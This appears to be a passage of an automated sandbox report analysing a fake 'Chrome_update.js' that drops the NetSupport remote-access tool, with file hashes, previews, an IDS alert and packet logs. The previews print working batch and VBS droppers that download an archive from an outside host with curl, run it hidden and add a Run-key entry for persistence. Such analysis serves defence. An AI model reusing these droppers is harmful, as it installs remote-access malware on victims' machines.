                                                          SHA-256:CEA3F6928121BF4382E7144B9A900CDCBECB7B7F95A14531EC0C04286A08489E
                                                          SHA-512:B647573EC25890736D94978AFB6E45C6762BA97963D91911CCD3ABF83660DA464496A4AD5AF9AFA6CAADAC76C6BE8D76B83E3DBC1987076F2560E3D7AF452B95
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:7z..'...b...;3#.....%........}.4....N]...........&...@...ZtA.4..x=i...h.5.UBh.K....KB}"GA..........x.....6.c.8..V.>..3.3.~...b..X......W.b...w....ubQ...h[....`..3)....>......U..K..Y.0}(.g..7..brw..y..../3z.t...,.g.@...aJ......0K........'Q......s.2!.@..7.g..~....a..........V.N3....../Mr$.yL.N...CKu8."N.i......#w..Oc...!..6.c..0......%.?.0..:...d....F..n..!....zz..v.9W..UB.n0........w..P...JD......L&..^G.o..(D..`y..e.N.B/..l...&..L..,.$..3.l.<G....C.a5...S.70g}...s........;.....#.#BlO.....h.5....u...y......NUU...B..S.m.......Q..E.D...6.. K.r.E....A.8..J;...5..q..(......V#...'......)....,.M.I..s...*#j..s.%.Z$....n<.......a...53u.,....^o....7j...;.2....1.N)p..>........L....qK\..$....@U.....I.F@.E+*.....~......aI^...w....V.t..o...2U,".d.4.......}..<.L.U.....z..a..7u.U1..ua`.....T.7....a.$.....N;..t.Fa7...?..s9.....ICU...;.w..F.w.[A@x.....U.k.$..!D.......C$h.I.._.h*...q...T...mN|....?/.......us.>..M..+..h......yBF.-...S...?b.f)......L..8......{f

                                                          C:\ProgramData\msvcr100.dll

                                                          Download File
                                                          Process:C:\ProgramData\7zz.exe
                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):773968
                                                          Entropy (8bit):6.901559811406837
                                                          Encrypted:false
                                                          SSDEEP:12288:nMmCy3nAgPAxN9ueqix/HEmxsvGrif8ZSy+rdQw2QRAtd74/vmYK6H3BVoe3z:MmCy3KxW3ixPEmxsvGrm8Z6r+JQPzV7z
                                                          MD5:0E37FBFA79D349D672456923EC5FBBE3
                                                          SHA1:4E880FC7625CCF8D9CA799D5B94CE2B1E7597335
                                                          SHA-256:8793353461826FBD48F25EA8B835BE204B758CE7510DB2AF631B28850355BD18
                                                          SHA-512:2BEA9BD528513A3C6A54BEAC25096EE200A4E6CCFC2A308AE9CFD1AD8738E2E2DEFD477D59DB527A048E5E9A4FE1FC1D771701DE14EF82B4DBCDC90DF0387630
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Reputation:unknown
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......:.y.~...~...~...w...}...~.......eD.....eD..+...eD..J...eD......eD......eD......eD......Rich~...................PE..L......M.........."!.........................0.....x......................................@..........................H......d...(.......................P.......$L...!..8...........................hE..@............................................text...!........................... ..`.data....Z...0...N..................@....rsrc................f..............@..@.reloc..$L.......N...j..............@..B................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\ProgramData\nskbfltr.inf

                                                          Download File
                                                          Process:C:\ProgramData\7zz.exe
                                                          File Type:Windows setup INFormation
                                                          Category:dropped
                                                          Size (bytes):328
                                                          Entropy (8bit):4.93007757242403
                                                          Encrypted:false
                                                          SSDEEP:6:a0S880EeLL6sWqYFcf8KYFEAy1JoHBIr2M2OIAXFYJKRLIkg/LH2yi9vyifjBLWh:JShNvPG1JoHBx2XFhILH4Burn
                                                          MD5:26E28C01461F7E65C402BDF09923D435
                                                          SHA1:1D9B5CFCC30436112A7E31D5E4624F52E845C573
                                                          SHA-256:D96856CD944A9F1587907CACEF974C0248B7F4210F1689C1E6BCAC5FED289368
                                                          SHA-512:C30EC66FECB0A41E91A31804BE3A8B6047FC3789306ADC106C723B3E5B166127766670C7DA38D77D3694D99A8CDDB26BC266EE21DBA60A148CDF4D6EE10D27D7
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:; nskbfltr.inf..;..; NS Keyboard Filter..; ..;..; This inf file installs the WDF Framework binaries....[Version]..Signature="$Windows NT$"..Provider=NSL......;..;--- nskbfltr Coinstaller installation ------..;......[nskbfltr.NT.Wdf]..KmdfService = nskbfltr, nskbfltr_wdfsect....[nskbfltr_wdfsect]..KmdfLibraryVersion = 1.5......

                                                          C:\ProgramData\nsm_vpro.ini

                                                          Download File
                                                          Process:C:\ProgramData\7zz.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):46
                                                          Entropy (8bit):4.532048032699691
                                                          Encrypted:false
                                                          SSDEEP:3:lsylULyJGI6csM:+ocyJGIPsM
                                                          MD5:3BE27483FDCDBF9EBAE93234785235E3
                                                          SHA1:360B61FE19CDC1AFB2B34D8C25D8B88A4C843A82
                                                          SHA-256:4BFA4C00414660BA44BDDDE5216A7F28AECCAA9E2D42DF4BBFF66DB57C60522B
                                                          SHA-512:EDBE8CF1CBC5FED80FEDF963ADE44E08052B19C064E8BCA66FA0FE1B332141FBE175B8B727F8F56978D1584BAAF27D331947C0B3593AAFF5632756199DC470E5
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:[COMMON]..Storage_Enabled=0..Debug_Level=0....

                                                          C:\ProgramData\pcicapi.dll

                                                          Download File
                                                          Process:C:\ProgramData\7zz.exe
                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):33144
                                                          Entropy (8bit):6.7376663312239256
                                                          Encrypted:false
                                                          SSDEEP:768:JFvNhAyi5hHA448qZkSn+EgT8ToDXTVi0:JCyoHA448qSSzgIQb
                                                          MD5:34DFB87E4200D852D1FB45DC48F93CFC
                                                          SHA1:35B4E73FB7C8D4C3FEFB90B7E7DC19F3E653C641
                                                          SHA-256:2D6C6200508C0797E6542B195C999F3485C4EF76551AA3C65016587788BA1703
                                                          SHA-512:F5BB4E700322CBAA5069244812A9B6CE6899CE15B4FD6384A3E8BE421E409E4526B2F67FE210394CD47C4685861FAF760EFF9AF77209100B82B2E0655581C9B2
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\ProgramData\pcicapi.dll, Author: Joe Security
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 3%
                                                          Reputation:unknown
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........+-..E~..E~..E~.\.~..E~.\.~..E~...~..E~..D~..E~.\.~..E~.\.~..E~.\.~..E~.\.~..E~...~..E~.\.~..E~Rich..E~........PE..L......U...........!.....2...........<.......P...............................`............@..........................^.......W..d....@..x............X..x)...P......`Q...............................V..@............P..@............................text....1.......2.................. ..`.rdata.......P.......6..............@..@.data...,....`.......F..............@....rsrc...x....@.......H..............@..@.reloc.......P.......P..............@..B........................................................................................................................................................................................................................................................................................................................

                                                          C:\ProgramData\putty.exe

                                                          Download File
                                                          Process:C:\ProgramData\7zz.exe
                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):1647912
                                                          Entropy (8bit):6.92723334837222
                                                          Encrypted:false
                                                          SSDEEP:49152:TDXOPFJK9bbYF8paMB8QMy3bHwPXNg/7UyW+ekBeZmn:T0WhreNg/X
                                                          MD5:F838FDAFD0881CF1E6040A07D78E840D
                                                          SHA1:2A35456B2F67BD12905378BEB6EAF373F6A0D0D1
                                                          SHA-256:FC6F9DBDF4B9F8DD1F5F3A74CB6E55119D3FE2C9DB52436E10BA07842E6C3D7C
                                                          SHA-512:5C0389EB79E5C2638C0D770CDE1A5C56A237AA596503966D4F226A99F94531AF501F8BF4EFA00722E12998F73271E50D8C187F8E984125AFFE40B1AB231503B4
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Reputation:unknown
                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d.....\c.........."......Z...p.................@.............................`......D.....`.............................................................X.......xl......(W...@..................................(......@...........(................................text...fY.......Z.................. ..`.rdata.......p.......^..............@..@.data....U...p.......^..............@....pdata..xl.......n...n..............@..@.00cfg..8....@......................@..@.gxfg...`*...P...,..................@..@.tls................................@..._RDATA..\...........................@..@.rsrc...X...........................@..@.reloc.......@... ..................@..B........................................................................................................................................................................................................................

                                                          C:\ProgramData\qweq.bat

                                                          Download File
                                                          Process:C:\Windows\System32\cmd.exe
                                                          File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                          Category:modified
                                                          Size (bytes):532
                                                          Entropy (8bit):5.259398326283338
                                                          Encrypted:false
                                                          SSDEEP:12:kh5ObfauP28nlxWZ3lMVj0ESLXRtf4LXnidEWSDcEA:B62AlMVJuXRtf8XnIED2
                                                          MD5:975B043ED876F1C265AACB60BBEA6B11
                                                          SHA1:3B8F7AE6B0282BE88D08B171BF9267FDF4CBF28E
                                                          SHA-256:F344211B6F67F0AE3D6256648526C6E986EC8E4F31367FA17AB963DE788BD6D8
                                                          SHA-512:E9D2E306B9A562E94B8793C87B7C4506274D67561D715871DFF1E88038C7413F32307602F5DDC97363A62875B16BBBD307D01DA897C88C6EB33F004A6FAE4877
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:@echo off....:: ssRsgs3sgsbgsggsgs3gsgs3s3Z6..:: ssRbZgs6gsgs326fssRb....start /b /min xcopy /h /y 7zz.exe C:\ProgramData\ && start /b /min cmd /c C:\ProgramData\7zz.exe x -y C:\ProgramData\lolo.7z -oC:\ProgramData\ && TIMEOUT /T 7 && start /b /min cmd /c C:\ProgramData\client32.exe....set CachedX=HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run..reg query "%CachedX%" >nul 2>&1.. if %errorlevel% equ 0 (.. reg add "%CachedX%" /v "CachedX" /t REG_SZ /d "C:\ProgramData\client32.exe" /f .. ).. ::fhgggsgs3sgs3sgssgs3sgssgs

                                                          C:\ProgramData\remcmdstub.exe

                                                          Download File
                                                          Process:C:\ProgramData\7zz.exe
                                                          File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):63864
                                                          Entropy (8bit):6.446503462786185
                                                          Encrypted:false
                                                          SSDEEP:1536:Tf6fvDuNcAjJMBUHYBlXU1wT2JFqy9BQhiK:D6f7cjJ4U4I1jFqy92hiK
                                                          MD5:6FCA49B85AA38EE016E39E14B9F9D6D9
                                                          SHA1:B0D689C70E91D5600CCC2A4E533FF89BF4CA388B
                                                          SHA-256:FEDD609A16C717DB9BEA3072BED41E79B564C4BC97F959208BFA52FB3C9FA814
                                                          SHA-512:F9C90029FF3DEA84DF853DB63DACE97D1C835A8CF7B6A6227A5B6DB4ABE25E9912DFED6967A88A128D11AB584663E099BF80C50DD879242432312961C0CFE622
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 3%
                                                          Reputation:unknown
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......$U..`4..`4..`4..{.D.q4..{.p.54..iLI.e4..`4..74..{.q.}4..{.@.a4..{.G.a4..Rich`4..................PE..L......U.....................J.......!............@.......................... .......o....@....................................<.......T...............x)..............................................@...............@............................text............................... ..`.rdata...%.......&..................@..@.data....-..........................@....rsrc...T...........................@..@.reloc..p...........................@..B........................................................................................................................................................................................................................................................................................................................................

                                                          C:\ProgramData\sett.bat

                                                          Download File
                                                          Process:C:\Windows\System32\cmd.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):247
                                                          Entropy (8bit):5.269129459799581
                                                          Encrypted:false
                                                          SSDEEP:6:CxBR2WXp+N23f9QSkCfFlCe8UlLAHbKx48HKmnOB1WXp+N23fQRnn:cnHONCfFADC0vTmnOKcnn
                                                          MD5:4FA8F25966DD40B0F58B4673079FA740
                                                          SHA1:336C2DE460D273589990BA488991A4F0F56A7E54
                                                          SHA-256:B8A0E8B0D5E4708422AC99F98FDAE3DAC3C4068090E6EB2E026FFAFF21D92B5F
                                                          SHA-512:4A7E8A290C09E0706136383365046E24964AF46DFD0B13D8688AF8D7F70F052752722C4D2AC79BC7C45940CF57D2A851B3D6ADDEE2003DCCDF1319572128925A
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:if not exist "C:\Users\user\AppData\Local\Temp/lolo.7z" ( curl -k "https://mangoairsoft.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/lolo.7z" -o "C:\ProgramData\lolo.7z" ) .."C:\Users\user\AppData\Local\Temp/sett.bat"..

                                                          C:\ProgramData\xcpCFFjZKLTFFLZfvqyQQKBvqwD.bat

                                                          Download File
                                                          Process:C:\Windows\System32\wscript.exe
                                                          File Type:DOS batch file, ASCII text
                                                          Category:dropped
                                                          Size (bytes):1908
                                                          Entropy (8bit):5.243181486469752
                                                          Encrypted:false
                                                          SSDEEP:24:VzNEa7DDmcKEK88leevTwKev5NaczevNDB4HK:Vz/7DPKEK8852Xt6NQK
                                                          MD5:CC74CF81F442E922B077F6CF0F87FA41
                                                          SHA1:D8BE8FCB85507D5B05A3025BB0CEFBD0B614DE96
                                                          SHA-256:6A58399A333E0B20E9FE1944EE997585A7A1927776308048DA1E3FB7734EF581
                                                          SHA-512:1F00A8B92F83B3E84D4798AB2805432CD3A1061CB294DFA4C869D9BAA0DF233A9BD68788DFC68BBAB9995305E7634937AA35AD3F75DC40095CF1BD0A53BF655C
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:@echo off..:: R11ffsRsfsRb.:: 3Z6fKfsRKfsRb..set "fdaa=set ".%fdaa%"fdgxvxcvxc=C:\Prog".%fdaa%"hghgdgdfsz=ramD".%fdaa%"hyturdfgf=ata\"..:: R11KfsffsRssRsRsRRb.:: ssRsRfsRsRRb..%fdgxvxcvxc%%hghgdgdfsz%%hyturdfgf%..set "fgdgh=set ".%fgdgh%"vbnvbv=Wscr".%fgdgh%"jhgcvbc=ipt.Sh".%fgdgh%"jhvbcs=ell"..:: RsfsRR11Rb.%vbnvbv%%jhgcvbc%%jhvbcs%..set "ghjgr=set ".%ghjgr%"cvbcvbsds=WSc".%ghjgr%"gfgxxc=rit.Ar".%ghjgr%"hgvbcvbc=guments"..:: R11fsRssRRRb..%cvbcvbsds%%gfgxxc%%hgvbcvbc%..:: 1sRs1sRs1sRs1sRs..echo CreateObject^(%vbnvbv%%jhgcvbc%%jhvbcs%^).Run ^& %cvbcvbsds%%gfgxxc%%hgvbcvbc%^(0^) ^& , 0, False > "%tmp%/b1.vbs".(echo if not exist "%tmp%/lolo.7z" ^( curl -k "https://mangoairsoft.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/lolo.7z" -o "%fdgxvxcvxc%%hghgdgdfsz%%hyturdfgf%lolo.7z" ^) & echo "%tmp%/sett.bat") > "%fdgxvxcvxc%%hghgdgdfsz%%hyturdfgf%sett.bat"..echo CreateObject^(%vbnvbv%%jhgcvbc%%jhvbcs%^).Run ^& %cvbcvbsds%%gfgxxc%%hgvbcvbc%^(0^) ^& , 0, False > "%tm

                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\loca[1].htm

                                                          Download File
                                                          Process:C:\ProgramData\client32.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):15
                                                          Entropy (8bit):2.8402239289418514
                                                          Encrypted:false
                                                          SSDEEP:3:yAcn:yV
                                                          MD5:020DF0663B4F5741AD652976C4207B0B
                                                          SHA1:50AAA69D3EA68A7B16AA8FCBD866A6598EC39392
                                                          SHA-256:0B4688799BA0DF92A3730B63635CC57F19DF94357AE63850AB96771A5711A3E1
                                                          SHA-512:A6CA0A74AC46AB3A42B61A534BD97D167DF6900627E9076D75C40744D9B87EF71C26C9D8C797D5B410BFEF8A7805B87DE81CCC9BB76743B69678C083E3B07AE9
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:47.1772,8.42719

                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\11[1].bat

                                                          Download File
                                                          Process:C:\Windows\System32\wscript.exe
                                                          File Type:DOS batch file, ASCII text
                                                          Category:dropped
                                                          Size (bytes):1908
                                                          Entropy (8bit):5.243181486469752
                                                          Encrypted:false
                                                          SSDEEP:24:VzNEa7DDmcKEK88leevTwKev5NaczevNDB4HK:Vz/7DPKEK8852Xt6NQK
                                                          MD5:CC74CF81F442E922B077F6CF0F87FA41
                                                          SHA1:D8BE8FCB85507D5B05A3025BB0CEFBD0B614DE96
                                                          SHA-256:6A58399A333E0B20E9FE1944EE997585A7A1927776308048DA1E3FB7734EF581
                                                          SHA-512:1F00A8B92F83B3E84D4798AB2805432CD3A1061CB294DFA4C869D9BAA0DF233A9BD68788DFC68BBAB9995305E7634937AA35AD3F75DC40095CF1BD0A53BF655C
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:@echo off..:: R11ffsRsfsRb.:: 3Z6fKfsRKfsRb..set "fdaa=set ".%fdaa%"fdgxvxcvxc=C:\Prog".%fdaa%"hghgdgdfsz=ramD".%fdaa%"hyturdfgf=ata\"..:: R11KfsffsRssRsRsRRb.:: ssRsRfsRsRRb..%fdgxvxcvxc%%hghgdgdfsz%%hyturdfgf%..set "fgdgh=set ".%fgdgh%"vbnvbv=Wscr".%fgdgh%"jhgcvbc=ipt.Sh".%fgdgh%"jhvbcs=ell"..:: RsfsRR11Rb.%vbnvbv%%jhgcvbc%%jhvbcs%..set "ghjgr=set ".%ghjgr%"cvbcvbsds=WSc".%ghjgr%"gfgxxc=rit.Ar".%ghjgr%"hgvbcvbc=guments"..:: R11fsRssRRRb..%cvbcvbsds%%gfgxxc%%hgvbcvbc%..:: 1sRs1sRs1sRs1sRs..echo CreateObject^(%vbnvbv%%jhgcvbc%%jhvbcs%^).Run ^& %cvbcvbsds%%gfgxxc%%hgvbcvbc%^(0^) ^& , 0, False > "%tmp%/b1.vbs".(echo if not exist "%tmp%/lolo.7z" ^( curl -k "https://mangoairsoft.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/lolo.7z" -o "%fdgxvxcvxc%%hghgdgdfsz%%hyturdfgf%lolo.7z" ^) & echo "%tmp%/sett.bat") > "%fdgxvxcvxc%%hghgdgdfsz%%hyturdfgf%sett.bat"..echo CreateObject^(%vbnvbv%%jhgcvbc%%jhvbcs%^).Run ^& %cvbcvbsds%%gfgxxc%%hgvbcvbc%^(0^) ^& , 0, False > "%tm

                                                          C:\Users\user\AppData\Local\Temp\b1.vbs

                                                          Download File
                                                          Process:C:\Windows\System32\cmd.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):70
                                                          Entropy (8bit):4.6987263671247135
                                                          Encrypted:false
                                                          SSDEEP:3:FER/McVqQDDIgk7O+JF9Bv:FEREkqOMgkq+Lzv
                                                          MD5:A883AA8226B7A6328633EB161B7EFB85
                                                          SHA1:9493C6A36F9155D2C210E98582B7DEDC2E92987A
                                                          SHA-256:EE218F8B91B270886DC87064F014AC734E0E80EC87214DCF149B436CCFA8B9DA
                                                          SHA-512:A88DE3B82705C7170B21A12A76EA27A07D31F0C9A85A8F02FCAB2C5E42669F62A9B157E52DDA9CC497BCB93E3D11FCD5D47553B44BB4C018CE642E7A9694E678
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:CreateObject(Wscript.Shell).Run & WScrit.Arguments(0) & , 0, False ..

                                                          C:\Users\user\AppData\Local\Temp\b2.vbs

                                                          Download File
                                                          Process:C:\Windows\System32\cmd.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):70
                                                          Entropy (8bit):4.6987263671247135
                                                          Encrypted:false
                                                          SSDEEP:3:FER/McVqQDDIgk7O+JF9Bv:FEREkqOMgkq+Lzv
                                                          MD5:A883AA8226B7A6328633EB161B7EFB85
                                                          SHA1:9493C6A36F9155D2C210E98582B7DEDC2E92987A
                                                          SHA-256:EE218F8B91B270886DC87064F014AC734E0E80EC87214DCF149B436CCFA8B9DA
                                                          SHA-512:A88DE3B82705C7170B21A12A76EA27A07D31F0C9A85A8F02FCAB2C5E42669F62A9B157E52DDA9CC497BCB93E3D11FCD5D47553B44BB4C018CE642E7A9694E678
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:CreateObject(Wscript.Shell).Run & WScrit.Arguments(0) & , 0, False ..

                                                          C:\Users\user\AppData\Local\Temp\b3.vbs

                                                          Download File
                                                          Process:C:\Windows\System32\cmd.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):70
                                                          Entropy (8bit):4.6987263671247135
                                                          Encrypted:false
                                                          SSDEEP:3:FER/McVqQDDIgk7O+JF9Bv:FEREkqOMgkq+Lzv
                                                          MD5:A883AA8226B7A6328633EB161B7EFB85
                                                          SHA1:9493C6A36F9155D2C210E98582B7DEDC2E92987A
                                                          SHA-256:EE218F8B91B270886DC87064F014AC734E0E80EC87214DCF149B436CCFA8B9DA
                                                          SHA-512:A88DE3B82705C7170B21A12A76EA27A07D31F0C9A85A8F02FCAB2C5E42669F62A9B157E52DDA9CC497BCB93E3D11FCD5D47553B44BB4C018CE642E7A9694E678
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:CreateObject(Wscript.Shell).Run & WScrit.Arguments(0) & , 0, False ..

                                                          \Device\ConDrv

                                                          Download File
                                                          Process:C:\ProgramData\7zz.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):817
                                                          Entropy (8bit):5.0668216874897265
                                                          Encrypted:false
                                                          SSDEEP:12:p5gXLDM+zWZiTknz4oG4qixLKjoKLkVKWPpx6osPChYT1kmLB806GLYIQKI9DlHM:p5gXZWZiTOzr2jtgJ6lPHHNIbHM
                                                          MD5:52CE7FD84FE8DA2C5774CB7681DA4A75
                                                          SHA1:E339AF48FD51F99CA41BEE55445AC756CA1FF3BE
                                                          SHA-256:A61C29FF09042B0C2021B3F66BD905109AF04C27EBEDB6AF568A79ECF96784BB
                                                          SHA-512:1DD001AA6B82715DEE7ABA7B5D5C8B8DBE39E88A66B760947B86A78056A66DB539D2DAEDB5792872953E06C6B94839B20B80C5F87CACC6866DFB393FC5E4FA73
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:..7-Zip (A) 9.20 Copyright (c) 1999-2010 Igor Pavlov 2010-11-18....Processing archive: C:\ProgramData\lolo.7z....Extracting PScripts..Extracting CacheDate.dat..Extracting CacheMD5.dat..Extracting NSM.ini..Extracting nsm_vpro.ini..Extracting nskbfltr.inf..Extracting NSM.LIC..Extracting desktop.ini..Extracting client32.ini..Extracting PScripts\insert_delimiter.pscript..Extracting PScripts\rot-13.pscript..Extracting CacheURL.dat..Extracting HTML_Obj_list.txt..Extracting Settings.txt..Extracting client32.exe..Extracting remcmdstub.exe..Extracting HTCTL32.DLL..Extracting msvcr100.dll..Extracting pcicapi.dll..Extracting PCICHEK.DLL..Extracting PCICL32.DLL..Extracting TCCTL32.DLL..Extracting putty.exe....Everything is Ok....Folders: 1..Files: 22..Size: 7115655..Compressed: 2306944..

                                                          \Device\Null

                                                          Download File
                                                          Process:C:\Windows\System32\reg.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):123
                                                          Entropy (8bit):5.145369538607512
                                                          Encrypted:false
                                                          SSDEEP:3:+v8Nwqp2YqrZfyM1K7eDfFFFFqu//3d+RICkREvLAd0:rNgZH1jzLd+iW40
                                                          MD5:0587DF28B683C9AE9BF19D2A34DC1CE0
                                                          SHA1:D46563275A3123A5DDED28F4DDB609F1B04C8A20
                                                          SHA-256:46B93A34BB7E073C9C65F891D0A7D1782881E50F411385416A5ED3866948EC20
                                                          SHA-512:DE577BAEAF2176B24CA10F2A71AFF6C0376D99955A1CADB0B2ECEF204EA5B38359C4F4B754EA6738941A85DF8EA8E1B18EE0301FE61D96DAF7830C3E9BEFD1F5
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:..HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run.. CachedX REG_SZ C:\ProgramData\client32.exe....

                                                          Static File Info

                                                          General

                                                          File type:ASCII text, with very long lines (61403), with CRLF line terminators
                                                          Entropy (8bit):5.714310528303861
                                                          TrID:
                                                            File name:Chrome_update.js
                                                            File size:683'010 bytes
                                                            MD5:9edcda5a5c3d8a6f55e9becfddfce21f
                                                            SHA1:4482d81c0190b81b9b16a48375b30e967c22a20b
                                                            SHA256:f01797fdfeb93b43fdf32bd4366475c437d4194575c5091179c40a52eb4937e6
                                                            SHA512:0bfe8c5f633c3df500ffbeeb3f45b3e8b570fc967785dbdc2292c15a37033cbdd5ea991acb474273d4f915e4dfca856c18db7e9b6a12f062b13835426141f8b7
                                                            SSDEEP:12288:Ic0Lc0rc0rc0rc0qD0DdD6DyH2sLZdBuuuuuuufRiobqbpbpbpbvUkUWUbU+g:Ic2cgcgcgcPI9yyRZdBuuuuuuufR1g
                                                            TLSH:3BE4133AED6CB193A125341F5CA66B7F1E46CA49029942DF3FCA4FC79029A15C0FB52C
                                                            File Content Preview:../*ZqhGvnoqBUSBeNAkCLVoWQXYtWjIlNgmlvQcpbkmNzWYZElFSnzuigfQNlSunNrfrjfgOIMADfcZfFqhvlwWzZitvqsFRceAaAhxqBUMSmIhKOFEVlBjNvJHuGtEVhpLAbLdzfCaqpgNjosajdcXIsIypYiZRJwUZtOCaXMDlgHVBizUbnmMgojpOtQxOiigoENokYdjtMctprPcIZKKebICufecXufSWHYsePlVjOgcQxmJMvICbfPtuYd

                                                            File Icon

                                                            Icon Hash:68d69b8bb6aa9a86

                                                            Network Behavior

                                                            Snort IDS Alerts

                                                            TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                            192.168.2.394.158.247.234970250502827745 08/02/23-10:16:18.944930TCP2827745ETPRO TROJAN NetSupport RAT CnC Activity497025050192.168.2.394.158.247.23

                                                            Network Port Distribution

                                                            TCP Packets

                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Aug 2, 2023 10:13:00.698767900 CEST49698443192.168.2.3188.127.230.147
                                                            Aug 2, 2023 10:13:00.698827982 CEST44349698188.127.230.147192.168.2.3
                                                            Aug 2, 2023 10:13:00.698918104 CEST49698443192.168.2.3188.127.230.147
                                                            Aug 2, 2023 10:13:00.710148096 CEST49698443192.168.2.3188.127.230.147
                                                            Aug 2, 2023 10:13:00.710191965 CEST44349698188.127.230.147192.168.2.3
                                                            Aug 2, 2023 10:13:00.840590000 CEST44349698188.127.230.147192.168.2.3
                                                            Aug 2, 2023 10:13:00.840698957 CEST49698443192.168.2.3188.127.230.147
                                                            Aug 2, 2023 10:13:01.092315912 CEST49698443192.168.2.3188.127.230.147
                                                            Aug 2, 2023 10:13:01.092382908 CEST44349698188.127.230.147192.168.2.3
                                                            Aug 2, 2023 10:13:01.093229055 CEST44349698188.127.230.147192.168.2.3
                                                            Aug 2, 2023 10:13:01.093343973 CEST49698443192.168.2.3188.127.230.147
                                                            Aug 2, 2023 10:13:01.095525980 CEST49698443192.168.2.3188.127.230.147
                                                            Aug 2, 2023 10:13:01.138825893 CEST44349698188.127.230.147192.168.2.3
                                                            Aug 2, 2023 10:13:01.152565956 CEST44349698188.127.230.147192.168.2.3
                                                            Aug 2, 2023 10:13:01.152590990 CEST44349698188.127.230.147192.168.2.3
                                                            Aug 2, 2023 10:13:01.152658939 CEST44349698188.127.230.147192.168.2.3
                                                            Aug 2, 2023 10:13:01.152684927 CEST49698443192.168.2.3188.127.230.147
                                                            Aug 2, 2023 10:13:01.152684927 CEST49698443192.168.2.3188.127.230.147
                                                            Aug 2, 2023 10:13:01.152760029 CEST49698443192.168.2.3188.127.230.147
                                                            Aug 2, 2023 10:13:01.156313896 CEST49698443192.168.2.3188.127.230.147
                                                            Aug 2, 2023 10:13:01.156357050 CEST44349698188.127.230.147192.168.2.3
                                                            Aug 2, 2023 10:13:02.058243036 CEST49699443192.168.2.3188.127.230.147
                                                            Aug 2, 2023 10:13:02.058303118 CEST44349699188.127.230.147192.168.2.3
                                                            Aug 2, 2023 10:13:02.058413982 CEST49699443192.168.2.3188.127.230.147
                                                            Aug 2, 2023 10:13:02.071631908 CEST49699443192.168.2.3188.127.230.147
                                                            Aug 2, 2023 10:13:02.071692944 CEST44349699188.127.230.147192.168.2.3
                                                            Aug 2, 2023 10:13:02.198029995 CEST44349699188.127.230.147192.168.2.3
                                                            Aug 2, 2023 10:13:02.198323011 CEST49699443192.168.2.3188.127.230.147
                                                            Aug 2, 2023 10:13:02.200820923 CEST49699443192.168.2.3188.127.230.147
                                                            Aug 2, 2023 10:13:02.200865984 CEST44349699188.127.230.147192.168.2.3
                                                            Aug 2, 2023 10:13:02.201474905 CEST44349699188.127.230.147192.168.2.3
                                                            Aug 2, 2023 10:13:02.207380056 CEST49699443192.168.2.3188.127.230.147
                                                            Aug 2, 2023 10:13:02.254823923 CEST44349699188.127.230.147192.168.2.3
                                                            Aug 2, 2023 10:13:02.372364998 CEST44349699188.127.230.147192.168.2.3
                                                            Aug 2, 2023 10:13:02.372406960 CEST44349699188.127.230.147192.168.2.3
                                                            Aug 2, 2023 10:13:02.372481108 CEST44349699188.127.230.147192.168.2.3
                                                            Aug 2, 2023 10:13:02.375113010 CEST49699443192.168.2.3188.127.230.147
                                                            Aug 2, 2023 10:13:02.375149965 CEST44349699188.127.230.147192.168.2.3
